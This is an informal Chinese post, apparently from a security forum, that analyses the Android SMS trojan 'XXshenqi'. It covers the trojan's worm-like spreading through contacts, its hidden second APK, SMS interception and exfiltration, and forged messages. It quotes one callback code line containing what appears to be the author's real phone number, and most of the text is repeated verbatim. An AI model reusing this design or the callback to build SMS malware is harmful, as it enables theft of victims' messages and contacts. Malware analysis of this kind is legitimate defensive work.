刚刚看了下 病毒样本
发现确实牛逼
新闻没说
病毒分为两个部分,一个是XXshenqi.apk,另一个是com.android.Trogoogle.apk
骗取本机联系人点击恶意链接下载病毒进行传播。
发送成功后,执行:
SmsManager.getDefault().sendTextMessage(“18670259904〃, null, “XXshenqi 群发链接OK”, null, null);
即向这个号码反馈执行信息。
开启一个MainActivity
在这个Activity中,安装一个com.example.com.android.trogoogle的文件,这个文件存在于xxshenqi.apk解压后文件的assets目录下。
安装木马后,会自动隐藏图标。
判断是否是命令短信,命令短信是用来向木马发送命令的。如果是平常的短信,就将截获的短信全部发往黑客手中,值得注意的是木马还判断短信是否是淘宝发送的短信,如果是的话就单独处理。
并且木马中还有发送伪造短信给用户的功能,如果是这种短信,木马就不会截获或者发送给黑客。
这里还存在的恶意行为是读取用户收件发件箱短信,以及手机中的联系人。
当截获完短信之后,木马就又开启了一个MySendEmailService服务。
这里也做了具体处理,就是判断是否是普通短信和淘宝网购信息,如果是淘宝信息就加上一个Flag发送,简直碉堡。
至此,这款病毒究竟做了些啥就基本清楚了,所做的操作也是一般短信木马的常有功能,包括截获短信并发送,发送恶意链接进行传播(冒充联系人发送,更有迷惑性),支持接收指令,以及发送恶意伪造的短信给用户(冒充联系人发送,更有迷惑性)等行为,
要是真早搞作者还可以对其进行加密,深度优化撒的可惜未加密直接导致了作者的手机号,QQ账号密码,小号被爆菊.....
发现确实牛逼
新闻没说
病毒分为两个部分,一个是XXshenqi.apk,另一个是com.android.Trogoogle.apk
骗取本机联系人点击恶意链接下载病毒进行传播。
发送成功后,执行:
SmsManager.getDefault().sendTextMessage(“18670259904〃, null, “XXshenqi 群发链接OK”, null, null);
即向这个号码反馈执行信息。
开启一个MainActivity
在这个Activity中,安装一个com.example.com.android.trogoogle的文件,这个文件存在于xxshenqi.apk解压后文件的assets目录下。
安装木马后,会自动隐藏图标。
判断是否是命令短信,命令短信是用来向木马发送命令的。如果是平常的短信,就将截获的短信全部发往黑客手中,值得注意的是木马还判断短信是否是淘宝发送的短信,如果是的话就单独处理。
并且木马中还有发送伪造短信给用户的功能,如果是这种短信,木马就不会截获或者发送给黑客。
这里还存在的恶意行为是读取用户收件发件箱短信,以及手机中的联系人。
当截获完短信之后,木马就又开启了一个MySendEmailService服务。
这里也做了具体处理,就是判断是否是普通短信和淘宝网购信息,如果是淘宝信息就加上一个Flag发送,简直碉堡。
至此,这款病毒究竟做了些啥就基本清楚了,所做的操作也是一般短信木马的常有功能,包括截获短信并发送,发送恶意链接进行传播(冒充联系人发送,更有迷惑性),支持接收指令,以及发送恶意伪造的短信给用户(冒充联系人发送,更有迷惑性)等行为,
要是真早搞作者还可以对其进行加密,深度优化撒的可惜未加密直接导致了作者的手机号,QQ账号密码,小号被爆菊.....
乌云
